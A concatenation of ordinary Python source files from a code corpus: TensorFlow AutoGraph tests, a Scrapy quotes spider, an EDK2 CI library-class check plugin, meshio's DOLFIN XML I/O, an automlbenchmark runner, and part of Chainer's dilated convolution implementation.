self.assertTransformedResult(test_fn, constant_op.constant(1), 1)
self.assertTransformedResult(test_fn, constant_op.constant(-1), -1)
def test_if_imbalanced_outputs(self):
def test_fn(n):
if n > 0:
b = 4
return b
node, ctx = self.prepare(test_fn, {})
with self.assertRaises(transformer.AutoGraphParseError):
control_flow.transform(node, ctx)
@test_util.run_deprecated_v1
def test_simple_for(self):
def test_fn(l):
s1 = 0
s2 = 0
for e in l:
s1 += e
s2 += e * e
return s1, s2
self.assertTransformedResult(test_fn, constant_op.constant([1, 3]), (4, 10))
empty_vector = constant_op.constant([], shape=(0,), dtype=dtypes.int32)
self.assertTransformedResult(test_fn, empty_vector, (0, 0))
@test_util.run_deprecated_v1
def test_for_single_output(self):
def test_fn(l):
s = 0
for e in l:
s += e
return s
self.assertTransformedResult(test_fn, constant_op.constant([1, 3]), 4)
empty_vector = constant_op.constant([], shape=(0,), dtype=dtypes.int32)
self.assertTransformedResult(test_fn, empty_vector, 0)
def test_for_iterated_expression(self):
eval_count = [0]
def count_evals(x):
eval_count[0] += 1
return x
def test_fn(n):
s = 0
for e in count_evals(range(n)):
s += e
return s
ns = {'count_evals': count_evals}
node, ctx = self.prepare(test_fn, ns)
node = control_flow.transform(node, ctx)
with self.compiled(node, ns) as result:
self.assertEqual(result.test_fn(5), 10)
self.assertEqual(eval_count[0], 1)
def test_for_variable_defined_in_body(self):
def bad_for_loop(n):
for i in range(n):
s = i
return s
node, ctx = self.prepare(bad_for_loop, {})
with self.assertRaises(NameError):
control_flow.transform(node, ctx)
@test_util.run_deprecated_v1
def test_for_tuple_unpacking(self):
def test_fn(x_list):
z = tf.constant(0) # pylint:disable=undefined-variable
for i, x in enumerate(x_list):
z = z + x + i
return z
self.assertTransformedResult(test_fn, [3, 3], 7)
if __name__ == '__main__':
test.main()
|
the-stack_0_3813 | import scrapy
from scrapy.loader import ItemLoader
from itemloaders_example.items import QuoteItem
class QuotesWithItemLoaderSpider(scrapy.Spider):
name = "quotes-with-itemloader"
start_urls = [
'http://quotes.toscrape.com',
]
def parse(self, response):
for quote in response.css('div.quote'):
# check the items.QuoteItem class to see how we've defined
# the input and output processors for each one of these fields
il = ItemLoader(item=QuoteItem(), selector=quote)
il.add_css('text', 'span.text::text')
il.add_css('author_name', 'small.author::text')
il.add_css('tags', 'a.tag::text')
il.add_value('url', response.url)
yield il.load_item()
next_page = response.css("li.next > a::attr(href)").extract_first()
if next_page is not None:
url = response.urljoin(next_page)
yield scrapy.Request(url, callback=self.parse)
|
the-stack_0_3817 | # @file LibraryClassCheck.py
#
# Copyright (c) Microsoft Corporation.
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
import logging
import os
from edk2toolext.environment.plugintypes.ci_build_plugin import ICiBuildPlugin
from edk2toollib.uefi.edk2.parsers.dec_parser import DecParser
from edk2toollib.uefi.edk2.parsers.inf_parser import InfParser
from edk2toolext.environment.var_dict import VarDict
class LibraryClassCheck(ICiBuildPlugin):
"""
A CiBuildPlugin that scans the code tree and library classes for undeclared
files
Configuration options:
"LibraryClassCheck": {
IgnoreHeaderFile: [], # Ignore a file found on disk
IgnoreLibraryClass: [] # Ignore a declaration found in dec file
}
"""
def GetTestName(self, packagename: str, environment: VarDict) -> tuple:
""" Provide the testcase name and classname for use in reporting
testclassname: a descriptive string for the testcase can include whitespace
classname: should be patterned <packagename>.<plugin>.<optionally any unique condition>
Args:
packagename: string containing name of package to build
environment: The VarDict for the test to run in
Returns:
a tuple containing the testcase name and the classname
(testcasename, classname)
"""
return ("Check library class declarations in " + packagename, packagename + ".LibraryClassCheck")
def __GetPkgDec(self, rootpath):
try:
allEntries = os.listdir(rootpath)
for entry in allEntries:
if entry.lower().endswith(".dec"):
return(os.path.join(rootpath, entry))
except Exception:
logging.error("Unable to find DEC for package:{0}".format(rootpath))
return None
##
# External function of plugin. This function is used to perform the task of the MuBuild Plugin
#
# - package is the edk2 path to package. This means workspace/packagepath relative.
# - edk2path object configured with workspace and packages path
# - PkgConfig Object (dict) for the pkg
# - EnvConfig Object
# - Plugin Manager Instance
# - Plugin Helper Obj Instance
# - Junit Logger
# - output_stream the StringIO output stream from this plugin via logging
def RunBuildPlugin(self, packagename, Edk2pathObj, pkgconfig, environment, PLM, PLMHelper, tc, output_stream=None):
overall_status = 0
LibraryClassIgnore = []
abs_pkg_path = Edk2pathObj.GetAbsolutePathOnThisSystemFromEdk2RelativePath(packagename)
abs_dec_path = self.__GetPkgDec(abs_pkg_path)
wsr_dec_path = Edk2pathObj.GetEdk2RelativePathFromAbsolutePath(abs_dec_path)
if abs_dec_path is None or wsr_dec_path == "" or not os.path.isfile(abs_dec_path):
tc.SetSkipped()
tc.LogStdError("No DEC file {0} in package {1}".format(abs_dec_path, abs_pkg_path))
return -1
# Get all include folders
dec = DecParser()
dec.SetBaseAbsPath(Edk2pathObj.WorkspacePath).SetPackagePaths(Edk2pathObj.PackagePathList)
dec.ParseFile(wsr_dec_path)
AllHeaderFiles = []
for includepath in dec.IncludePaths:
## Get all header files in the library folder
AbsLibraryIncludePath = os.path.join(abs_pkg_path, includepath, "Library")
if(not os.path.isdir(AbsLibraryIncludePath)):
continue
hfiles = self.WalkDirectoryForExtension([".h"], AbsLibraryIncludePath)
hfiles = [os.path.relpath(x,abs_pkg_path) for x in hfiles] # make package root relative path
hfiles = [x.replace("\\", "/") for x in hfiles] # make package relative path
AllHeaderFiles.extend(hfiles)
if len(AllHeaderFiles) == 0:
tc.SetSkipped()
tc.LogStdError(f"No Library include folder in any Include path")
return -1
# Remove ignored paths
if "IgnoreHeaderFile" in pkgconfig:
for a in pkgconfig["IgnoreHeaderFile"]:
try:
tc.LogStdOut("Ignoring Library Header File {0}".format(a))
AllHeaderFiles.remove(a)
except:
tc.LogStdError("LibraryClassCheck.IgnoreHeaderFile -> {0} not found. Invalid Header File".format(a))
logging.info("LibraryClassCheck.IgnoreHeaderFile -> {0} not found. Invalid Header File".format(a))
if "IgnoreLibraryClass" in pkgconfig:
LibraryClassIgnore = pkgconfig["IgnoreLibraryClass"]
## Attempt to find library classes
for lcd in dec.LibraryClasses:
## Check for correct file path separator
if "\\" in lcd.path:
tc.LogStdError("LibraryClassCheck.DecFilePathSeparator -> {0} invalid.".format(lcd.path))
logging.error("LibraryClassCheck.DecFilePathSeparator -> {0} invalid.".format(lcd.path))
overall_status += 1
continue
if lcd.name in LibraryClassIgnore:
tc.LogStdOut("Ignoring Library Class Name {0}".format(lcd.name))
LibraryClassIgnore.remove(lcd.name)
continue
logging.debug(f"Looking for Library Class {lcd.path}")
try:
AllHeaderFiles.remove(lcd.path)
except ValueError:
tc.LogStdError(f"Library {lcd.name} with path {lcd.path} not found in package filesystem")
logging.error(f"Library {lcd.name} with path {lcd.path} not found in package filesystem")
overall_status += 1
## any remaining AllHeaderFiles are not described in DEC
for h in AllHeaderFiles:
tc.LogStdError(f"Library Header File {h} not declared in package DEC {wsr_dec_path}")
logging.error(f"Library Header File {h} not declared in package DEC {wsr_dec_path}")
overall_status += 1
## Warn about any invalid library class names in the ignore list
for r in LibraryClassIgnore:
tc.LogStdError("LibraryClassCheck.IgnoreLibraryClass -> {0} not found. Library Class not found".format(r))
logging.info("LibraryClassCheck.IgnoreLibraryClass -> {0} not found. Library Class not found".format(r))
# If XML object exists, add result
if overall_status != 0:
tc.SetFailed("LibraryClassCheck {0} Failed. Errors {1}".format(wsr_dec_path, overall_status), "CHECK_FAILED")
else:
tc.SetSuccess()
return overall_status
|
the-stack_0_3820 | """
I/O for DOLFIN's XML format, cf.
<https://people.sc.fsu.edu/~jburkardt/data/dolfin_xml/dolfin_xml.html>.
"""
import logging
import os
import pathlib
import re
from xml.etree import ElementTree as ET
import numpy
from .._exceptions import ReadError, WriteError
from .._helpers import register
from .._mesh import Mesh
def _read_mesh(filename):
dolfin_to_meshio_type = {"triangle": ("triangle", 3), "tetrahedron": ("tetra", 4)}
# Use iterparse() to avoid loading the entire file via parse(). iterparse()
# allows to discard elements (via clear()) after they have been processed.
# See <https://stackoverflow.com/a/326541/353337>.
dim = None
points = None
keys = None
cell_type = None
num_nodes_per_cell = None
for event, elem in ET.iterparse(filename, events=("start", "end")):
if event == "end":
continue
if elem.tag == "dolfin":
# Don't be too strict with the assertion. Some mesh files don't have the
# proper tags.
# assert elem.attrib['nsmap'] \
# == '{\'dolfin\': \'https://fenicsproject.org/\'}'
pass
elif elem.tag == "mesh":
dim = int(elem.attrib["dim"])
cell_type, num_nodes_per_cell = dolfin_to_meshio_type[
elem.attrib["celltype"]
]
cell_tags = [f"v{i}" for i in range(num_nodes_per_cell)]
elif elem.tag == "vertices":
if dim is None:
raise ReadError("Expected `mesh` before `vertices`")
points = numpy.empty((int(elem.attrib["size"]), dim))
keys = ["x", "y"]
if dim == 3:
keys += ["z"]
elif elem.tag == "vertex":
if points is None or keys is None:
raise ReadError("Expected `vertices` before `vertex`")
k = int(elem.attrib["index"])
points[k] = [elem.attrib[key] for key in keys]
elif elem.tag == "cells":
if cell_type is None or num_nodes_per_cell is None:
raise ReadError("Expected `mesh` before `cells`")
cells = [
(
cell_type,
numpy.empty(
(int(elem.attrib["size"]), num_nodes_per_cell), dtype=int
),
)
]
elif elem.tag in ["triangle", "tetrahedron"]:
k = int(elem.attrib["index"])
cells[0][1][k] = [elem.attrib[t] for t in cell_tags]
else:
logging.warning("Unknown entry %s. Ignoring.", elem.tag)
elem.clear()
return points, cells, cell_type
def _read_cell_data(filename):
dolfin_type_to_numpy_type = {
"int": numpy.dtype("int"),
"float": numpy.dtype("float"),
"uint": numpy.dtype("uint"),
}
cell_data = {}
dir_name = pathlib.Path(filename).resolve().parent
# Loop over all files in the same directory as `filename`.
basename = pathlib.Path(filename).stem
for f in os.listdir(dir_name):
# Check if there are files by the name "<filename>_*.xml"; if yes,
# extract the * pattern and make it the name of the data set.
out = re.match(f"{basename}_([^\\.]+)\\.xml", f)
if not out:
continue
name = out.group(1)
parser = ET.XMLParser()
tree = ET.parse((dir_name / f).as_posix(), parser)
root = tree.getroot()
mesh_functions = list(root)
if len(mesh_functions) != 1:
raise ReadError("Can only handle one mesh function")
mesh_function = mesh_functions[0]
if mesh_function.tag != "mesh_function":
raise ReadError()
size = int(mesh_function.attrib["size"])
dtype = dolfin_type_to_numpy_type[mesh_function.attrib["type"]]
data = numpy.empty(size, dtype=dtype)
for child in mesh_function:
if child.tag != "entity":
raise ReadError()
idx = int(child.attrib["index"])
data[idx] = child.attrib["value"]
if name not in cell_data:
cell_data[name] = []
cell_data[name].append(data)
return cell_data
def read(filename):
points, cells, _ = _read_mesh(filename)
cell_data = _read_cell_data(filename)
return Mesh(points, cells, cell_data=cell_data)
def _write_mesh(filename, points, cell_type, cells):
stripped_cells = [c for c in cells if c.type == cell_type]
meshio_to_dolfin_type = {"triangle": "triangle", "tetra": "tetrahedron"}
if any(c.type != cell_type for c in cells):
discarded_cell_types = {c.type for c in cells if c.type != cell_type}
logging.warning(
"DOLFIN XML can only handle one cell type at a time. "
"Using %s, discarding %s.",
cell_type,
", ".join(discarded_cell_types),
)
dim = points.shape[1]
if dim not in [2, 3]:
raise WriteError(f"Can only write dimension 2, 3, got {dim}.")
coord_names = ["x", "y"]
if dim == 3:
coord_names += ["z"]
with open(filename, "w") as f:
f.write("<dolfin nsmap=\"{'dolfin': 'https://fenicsproject.org/'}\">\n")
ct = meshio_to_dolfin_type[cell_type]
f.write(f' <mesh celltype="{ct}" dim="{dim}">\n')
num_points = len(points)
f.write(f' <vertices size="{num_points}">\n')
for idx, point in enumerate(points):
s = " ".join(f'{xyz}="{p}"' for xyz, p in zip("xyz", point))
f.write(f' <vertex index="{idx}" {s} />\n')
f.write(" </vertices>\n")
num_cells = 0
for c in stripped_cells:
num_cells += len(c.data)
f.write(f' <cells size="{num_cells}">\n')
idx = 0
for ct, cls in stripped_cells:
type_string = meshio_to_dolfin_type[ct]
for cell in cls:
s = " ".join(f'v{k}="{c}"' for k, c in enumerate(cell))
f.write(f' <{type_string} index="{idx}" {s} />\n')
idx += 1
f.write(" </cells>\n")
f.write(" </mesh>\n")
f.write("</dolfin>")
def _numpy_type_to_dolfin_type(dtype):
types = {
"int": [numpy.int8, numpy.int16, numpy.int32, numpy.int64],
"uint": [numpy.uint8, numpy.uint16, numpy.uint32, numpy.uint64],
"float": [numpy.float16, numpy.float32, numpy.float64],
}
for key, numpy_types in types.items():
for numpy_type in numpy_types:
if numpy.issubdtype(dtype, numpy_type):
return key
raise WriteError("Could not convert NumPy data type to DOLFIN data type.")
def _write_cell_data(filename, dim, cell_data):
dolfin = ET.Element("dolfin", nsmap={"dolfin": "https://fenicsproject.org/"})
mesh_function = ET.SubElement(
dolfin,
"mesh_function",
type=_numpy_type_to_dolfin_type(cell_data.dtype),
dim=str(dim),
size=str(len(cell_data)),
)
for k, value in enumerate(cell_data):
ET.SubElement(mesh_function, "entity", index=str(k), value=repr(value))
tree = ET.ElementTree(dolfin)
tree.write(filename)
def write(filename, mesh):
logging.warning("DOLFIN XML is a legacy format. Consider using XDMF instead.")
if any("tetra" == c.type for c in mesh.cells):
cell_type = "tetra"
elif any("triangle" == c.type for c in mesh.cells):
cell_type = "triangle"
else:
raise WriteError(
"DOLFIN XML only supports triangles and tetrahedra. "
"Consider using XDMF instead."
)
_write_mesh(filename, mesh.points, cell_type, mesh.cells)
for name, lst in mesh.cell_data.items():
for data in lst:
fname = os.path.splitext(filename)[0]
cell_data_filename = f"{fname}_{name}.xml"
dim = 2 if mesh.points.shape[1] == 2 or all(mesh.points[:, 2] == 0) else 3
_write_cell_data(cell_data_filename, dim, numpy.array(data))
register("dolfin-xml", [".xml"], read, {"dolfin-xml": write})
|
the-stack_0_3822 | import argparse
import logging
import os
import sys
# prevent asap other modules from defining the root logger using basicConfig
import automl.logger
import automl
from automl.utils import Namespace as ns, config_load, datetime_iso, str2bool
from automl import log
parser = argparse.ArgumentParser()
parser.add_argument('framework', type=str,
help="The framework to evaluate as defined by default in resources/frameworks.yaml.")
parser.add_argument('benchmark', type=str, nargs='?', default='test',
help="The benchmark type to run as defined by default in resources/benchmarks/{benchmark}.yaml "
"or the path to a benchmark description file. Defaults to `%(default)s`.")
parser.add_argument('-m', '--mode', choices=['local', 'docker', 'aws'], default='local',
help="The mode that specifies how/where the benchmark tasks will be running. Defaults to %(default)s.")
parser.add_argument('-t', '--task', metavar='task_id', nargs='*', default=None,
help="The specific task name (as defined in the benchmark file) to run. "
"If not provided, then all tasks from the benchmark will be run.")
parser.add_argument('-f', '--fold', metavar='fold_num', type=int, nargs='*', default=None,
help="If task is provided, the specific fold(s) to run. "
"If fold is not provided, then all folds from the task definition will be run.")
parser.add_argument('-i', '--indir', metavar='input_dir', default=None,
help="Folder where datasets are loaded by default. Defaults to `input_dir` as defined in resources/config.yaml")
parser.add_argument('-o', '--outdir', metavar='output_dir', default=None,
help="Folder where all the outputs should be written. Defaults to `output_dir` as defined in resources/config.yaml")
parser.add_argument('-u', '--userdir', metavar='user_dir', default=None,
help="Folder where all the customizations are stored. Defaults to `user_dir` as defined in resources/config.yaml")
parser.add_argument('-p', '--parallel', metavar='parallel_jobs', type=int, default=1,
help="The number of jobs (i.e. tasks or folds) that can run in parallel. Defaults to %(default)s. "
"Currently supported only in docker and aws mode.")
parser.add_argument('-s', '--setup', choices=['auto', 'skip', 'force', 'only'], default='auto',
help="Framework/platform setup mode. Defaults to %(default)s. "
"•auto: setup is executed only if strictly necessary. •skip: setup is skipped. •force: setup is always executed before the benchmark. •only: only setup is executed (no benchmark).")
parser.add_argument('-k', '--keep-scores', type=str2bool, metavar='true|false', nargs='?', const=True, default=True,
help="Set to true [default] to save/add scores in output directory.")
parser.add_argument('--profiling', nargs='?', const=True, default=False, help=argparse.SUPPRESS)
parser.add_argument('-X', '--extra', default=[], action='append', help=argparse.SUPPRESS)
# group = parser.add_mutually_exclusive_group()
# group.add_argument('--keep-scores', dest='keep_scores', action='store_true',
# help="Set to true [default] to save/add scores in output directory")
# group.add_argument('--no-keep-scores', dest='keep_scores', action='store_false')
# parser.set_defaults(keep_scores=True)
# removing this command line argument for now: by default, we're using the user default region as defined in ~/aws/config
# on top of this, user can now override the aws.region setting in his custom ~/.config/automlbenchmark/config.yaml settings.
# parser.add_argument('-r', '--region', metavar='aws_region', default=None,
# help="The region on which to run the benchmark when using AWS.")
args = parser.parse_args()
script_name = os.path.splitext(os.path.basename(__file__))[0]
log_dir = os.path.join(args.outdir if args.outdir else '.', 'logs')
os.makedirs(log_dir, exist_ok=True)
now_str = datetime_iso(date_sep='', time_sep='')
# now_str = datetime_iso(time=False, no_sep=True)
if args.profiling:
logging.TRACE = logging.INFO
automl.logger.setup(log_file=os.path.join(log_dir, '{script}_{now}.log'.format(script=script_name, now=now_str)),
root_file=os.path.join(log_dir, '{script}_{now}_full.log'.format(script=script_name, now=now_str)),
root_level='DEBUG', console_level='INFO', print_to_log=True)
log.info("Running `%s` on `%s` benchmarks in `%s` mode.", args.framework, args.benchmark, args.mode)
log.debug("Script args: %s.", args)
extras = {t[0]: t[1] if len(t) > 1 else True for t in [x.split('=', 1) for x in args.extra]}
config = config_load("resources/config.yaml")
# allowing config override from user_dir: useful to define custom benchmarks and frameworks for example.
config_user = config_load(os.path.join(args.userdir if args.userdir is not None else config.user_dir, "config.yaml"))
# config listing properties set by command line
config_args = ns.parse(
{'results.save': args.keep_scores},
input_dir=args.indir,
output_dir=args.outdir,
user_dir=args.userdir,
run_mode=args.mode,
script=os.path.basename(__file__),
) + ns.parse(extras)
config_args = ns({k: v for k, v in config_args if v is not None})
log.debug("Config args: %s.", config_args)
# merging all configuration files
automl.resources.from_configs(config, config_user, config_args)
try:
if args.mode == 'local':
bench = automl.Benchmark(args.framework, args.benchmark, parallel_jobs=args.parallel)
elif args.mode == 'docker':
bench = automl.DockerBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel)
elif args.mode == 'aws':
bench = automl.AWSBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel)
# bench = automl.AWSBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel, region=args.region)
# elif args.mode == "aws-remote":
# bench = automl.AWSRemoteBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel, region=args.region)
else:
raise ValueError("`mode` must be one of 'aws', 'docker' or 'local'.")
if args.setup == 'only':
log.warning("Setting up %s environment only for %s, no benchmark will be run.", args.mode, args.framework)
if not args.keep_scores and args.mode != 'local':
log.warning("`keep_scores` parameter is currently ignored in %s mode, scores are always saved in this mode.", args.mode)
bench.setup(automl.Benchmark.SetupMode[args.setup])
if args.setup != 'only':
res = bench.run(args.task, args.fold)
except ValueError as e:
log.error('\nERROR:\n%s', e)
if extras.get('verbose') is True:
log.exception(e)
sys.exit(1)
|
the-stack_0_3824 | import numpy
from six import moves
import chainer
from chainer import cuda
from chainer import function
from chainer.utils import conv
from chainer.utils import type_check
from chainer import variable
if cuda.cudnn_enabled:
cudnn = cuda.cudnn
libcudnn = cuda.cudnn.cudnn
_fwd_pref = libcudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT
_bwd_filter_pref = \
libcudnn.CUDNN_CONVOLUTION_BWD_FILTER_SPECIFY_WORKSPACE_LIMIT
_bwd_data_pref = \
libcudnn.CUDNN_CONVOLUTION_BWD_DATA_SPECIFY_WORKSPACE_LIMIT
def _pair(x):
if hasattr(x, '__getitem__'):
return x
return x, x
class DilatedConvolution2DFunction(function.Function):
def __init__(self, stride=1, pad=0, dilate=1, cover_all=False,
requires_x_grad=True):
self.sy, self.sx = _pair(stride)
self.ph, self.pw = _pair(pad)
self.dy, self.dx = _pair(dilate)
self.cover_all = cover_all
self.requires_x_grad = requires_x_grad
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(2 <= n_in, n_in <= 3)
x_type = in_types[0]
w_type = in_types[1]
type_check.expect(
x_type.dtype.kind == 'f',
w_type.dtype.kind == 'f',
x_type.ndim == 4,
w_type.ndim == 4,
x_type.shape[1] == w_type.shape[1],
)
if type_check.eval(n_in) == 3:
b_type = in_types[2]
type_check.expect(
b_type.dtype == x_type.dtype,
b_type.ndim == 1,
b_type.shape[0] == w_type.shape[0],
)
def forward_cpu(self, inputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
if not all([isinstance(i, numpy.ndarray) for i in inputs]):
if b is not None:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}, type(b): {2}'
.format(type(W), type(x), type(b)))
else:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}'
.format(type(W), type(x)))
kh, kw = W.shape[2:]
self.col = conv.im2col_cpu(
x, kh, kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all, dy=self.dy, dx=self.dx)
y = numpy.tensordot(
self.col, W, ((1, 2, 3), (1, 2, 3))).astype(x.dtype, copy=False)
if b is not None:
y += b
return numpy.rollaxis(y, 3, 1),
def forward_gpu(self, inputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
if not all([isinstance(i, cuda.ndarray) for i in inputs]):
if b is not None:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}, type(b): {2}'
.format(type(W), type(x), type(b)))
else:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}'
.format(type(W), type(x)))
out_c, _, kh, kw = W.shape
n, c, h, w = x.shape
dkh, dkw = kh + (kh - 1) * (self.dy - 1), kw + (kw - 1) * (self.dx - 1)
out_h = conv.get_conv_outsize(h, kh, self.sy, self.ph,
cover_all=self.cover_all, d=self.dy)
out_w = conv.get_conv_outsize(w, kw, self.sx, self.pw,
cover_all=self.cover_all, d=self.dx)
y = cuda.cupy.zeros((n, out_c, out_h, out_w), dtype=x.dtype)
if (not self.cover_all and chainer.should_use_cudnn('>=auto') and
x.dtype == W.dtype):
pad_x = cuda.cupy.zeros((n, c, h + 2 * self.ph, w + 2 * self.pw),
dtype=x.dtype)
pad_x[:, :, self.ph:self.ph + h, self.pw:self.pw + w] = x
out_h_s1 = h + 2 * self.ph - dkh + 1
out_w_s1 = w + 2 * self.pw - dkw + 1
for j in moves.range(kh):
for i in moves.range(kw):
xji = cuda.cupy.ascontiguousarray(
pad_x[:, :,
j * self.dy:j * self.dy + out_h_s1,
i * self.dx:i * self.dx + out_w_s1])
Wji = cuda.cupy.ascontiguousarray(
W[:, :, j:j + 1, i:i + 1])
if i == 0 and j == 0:
handle = cudnn.get_handle()
xji_desc = cudnn.create_tensor_descriptor(xji)
y_desc = cudnn.create_tensor_descriptor(y)
self.filter_desc = cudnn.create_filter_descriptor(Wji)
self.conv_desc = cudnn.create_convolution_descriptor(
(0, 0), (self.sy, self.sx), xji.dtype)
workspace_size = cuda.get_max_workspace_size()
workspace = cuda.cupy.empty(
(workspace_size,), dtype='b')
algo = libcudnn.getConvolutionForwardAlgorithm(
handle, xji_desc.value, self.filter_desc.value,
self.conv_desc.value, y_desc.value, _fwd_pref,
workspace_size)
oz_dtype = 'd' if x.dtype == 'd' else 'f'
one = numpy.array(1, dtype=oz_dtype).ctypes
libcudnn.convolutionForward(
handle, one.data, xji_desc.value, xji.data.ptr,
self.filter_desc.value, Wji.data.ptr,
self.conv_desc.value, algo, workspace.data.ptr,
workspace_size, one.data, y_desc.value, y.data.ptr)
if b is not None:
b = cuda.cupy.ascontiguousarray(b)
self.bias_desc = cudnn.create_tensor_descriptor(
b[None, :, None, None])
cudnn.add_tensor(
handle, one.data, self.bias_desc.value, b.data.ptr,
one.data, y_desc.value, y.data.ptr)
else:
# Implementation using im2col
self.col = conv.im2col_gpu(
x, kh, kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all, dy=self.dy, dx=self.dx)
y = cuda.cupy.tensordot(
self.col, W, ((1, 2, 3), (1, 2, 3))).astype(x.dtype,
copy=False)
# TODO(beam2d): Support unshared bias
if b is not None:
y += b
y = cuda.cupy.rollaxis(y, 3, 1)
return y,
def backward_cpu(self, inputs, grad_outputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
gy = grad_outputs[0]
h, w = x.shape[2:]
gW = numpy.tensordot(
gy, self.col, ((0, 2, 3), (0, 4, 5))).astype(W.dtype, copy=False)
if not self.requires_x_grad:
gx = None
else:
gcol = numpy.tensordot(W, gy, (0, 1)).astype(x.dtype, copy=False)
gcol = numpy.rollaxis(gcol, 3)
gx = conv.col2im_cpu(gcol, self.sy, self.sx, self.ph, self.pw,
h, w, dy=self.dy, dx=self.dx)
if b is None:
return gx, gW
else:
gb = gy.sum(axis=(0, 2, 3))
return gx, gW, gb
def backward_gpu(self, inputs, grad_outputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
gy = grad_outputs[0]
_, out_c, out_h, out_w = gy.shape
n, c, h, w = x.shape
kh, kw = W.shape[2:]
dkh, dkw = kh + (kh - 1) * (self.dy - 1), kw + (kw - 1) * (self.dx - 1)
gW = cuda.cupy.empty_like(W)
if (not self.cover_all and chainer.should_use_cudnn('>=auto') and
x.dtype == W.dtype):
pad_x = cuda.cupy.zeros(
(n, c, h + 2 * self.ph, w + 2 * self.pw), dtype=x.dtype)
pad_x[:, :, self.ph:self.ph + h, self.pw:self.pw + w] = x
out_h_s1 = h + 2 * self.ph - dkh + 1
out_w_s1 = w + 2 * self.pw - dkw + 1
out_sh = out_h + (out_h - 1) * (self.sy - 1)
out_sw = out_w + (out_w - 1) * (self.sx - 1)
gy_ph = (h + dkh - out_sh - 1) / 2
gy_pw = (w + dkw - out_sw - 1) / 2
pad_gy = cuda.cupy.zeros(
(n, out_c, h + dkh - 1, w + dkw - 1), dtype=x.dtype)
pad_gy[:, :,
gy_ph:gy_ph + out_sh:self.sy,
gy_pw:gy_pw + out_sw:self.sx] = gy
gx = None
for j in moves.range(kh):
for i in moves.range(kw):
xji = cuda.cupy.ascontiguousarray(
pad_x[:, :,
j * self.dy:j * self.dy + out_h_s1,
i * self.dx:i * self.dx + out_w_s1])
gyji = cuda.cupy.ascontiguousarray(
pad_gy[:, :,
j * self.dy:j * self.dy + h,
i * self.dx:i * self.dx + w])
Wji = cuda.cupy.ascontiguousarray(
W[:, :, -1::-1, -1::-1][:, :, j:j + 1, i:i + 1])
if i == 0 and j == 0:
x = cuda.cupy.ascontiguousarray(x)
gy = cuda.cupy.ascontiguousarray(gy)
handle = cudnn.get_handle()
x_desc = cudnn.create_tensor_descriptor(x)
xji_desc = cudnn.create_tensor_descriptor(xji)
gy_desc = cudnn.create_tensor_descriptor(gy)
gyji_desc = cudnn.create_tensor_descriptor(gyji)
conv_desc_data = cudnn.create_convolution_descriptor(
(0, 0), (1, 1), xji.dtype)
oz_dtype = 'd' if x.dtype == 'd' else 'f'
one = numpy.array(1, dtype=oz_dtype).ctypes
zero = numpy.array(0, dtype=oz_dtype).ctypes
if self.requires_x_grad:
gx = cuda.cupy.zeros_like(x)
gWji = cuda.cupy.empty((out_c, c, 1, 1), dtype=W.dtype)
workspace_size = cuda.get_max_workspace_size()
workspace = cuda.cupy.empty(
(workspace_size,), dtype='b')
algo_filter = (
libcudnn.getConvolutionBackwardFilterAlgorithm(
handle, xji_desc.value, gy_desc.value,
self.conv_desc.value,
self.filter_desc.value,
_bwd_filter_pref, workspace_size))
algo_data = (
libcudnn.getConvolutionBackwardDataAlgorithm(
handle, self.filter_desc.value,
gyji_desc.value, conv_desc_data.value,
x_desc.value, _bwd_data_pref,
workspace_size))
libcudnn.convolutionBackwardFilter_v3(
handle, one.data, xji_desc.value, xji.data.ptr,
gy_desc.value, gy.data.ptr, self.conv_desc.value,
algo_filter, workspace.data.ptr, workspace_size,
zero.data, self.filter_desc.value, gWji.data.ptr)
if self.requires_x_grad:
libcudnn.convolutionBackwardData_v3(
handle, one.data, self.filter_desc.value,
Wji.data.ptr, gyji_desc.value,
gyji.data.ptr, conv_desc_data.value,
algo_data, workspace.data.ptr, workspace_size,
one.data, x_desc.value, gx.data.ptr)
gW[:, :, j:j + 1, i:i + 1] = gWji
if b is not None:
gb = cuda.cupy.empty_like(b)
libcudnn.convolutionBackwardBias(
handle, one.data, gy_desc.value, gy.data.ptr,
zero.data, self.bias_desc.value, gb.data.ptr)
else:
gW = cuda.cupy.tensordot(
gy, self.col, ((0, 2, 3), (0, 4, 5))).astype(W.dtype,
copy=False)
if not self.requires_x_grad:
gx = None
else:
gcol = cuda.cupy.tensordot(W, gy, (0, 1)).astype(x.dtype,
copy=False)
gcol = cuda.cupy.rollaxis(gcol, 3)
gx = conv.col2im_gpu(gcol, self.sy, self.sx, self.ph, self.pw,
h, w, dy=self.dy, dx=self.dx)
if b is not None:
gb = gy.sum(axis=(0, 2, 3))
if b is None:
return gx, gW
else:
return gx, gW, gb
def dilated_convolution_2d(x, W, b=None, stride=1, pad=0, dilate=1,
cover_all=False):
"""Two-dimensional dilated convolution function.
This is an implementation of two-dimensional dilated convolution
in ConvNets.
It takes three variables: the input image ``x``, the filter weight ``W``,
and the bias vector ``b``.
Notation: here is a notation for dimensionalities.
- :math:`n` is the batch size.
- :math:`c_I` and :math:`c_O` are the number of the input and output,
respectively.
- :math:`h` and :math:`w` are the height and width of the input image,
respectively.
- :math:`k_H` and :math:`k_W` are the height and width of the filters,
respectively.
Args:
x (~chainer.Variable): Input variable of shape :math:`(n, c_I, h, w)`.
W (~chainer.Variable): Weight variable of shape
:math:`(c_O, c_I, k_H, k_W)`.
b (~chainer.Variable): Bias variable of length :math:`c_O` (optional).
stride (int or pair of ints): Stride of filter applications.
``stride=s`` and ``stride=(s, s)`` are equivalent.
pad (int or pair of ints): Spatial padding width for input arrays.
``pad=p`` and ``pad=(p, p)`` are equivalent.
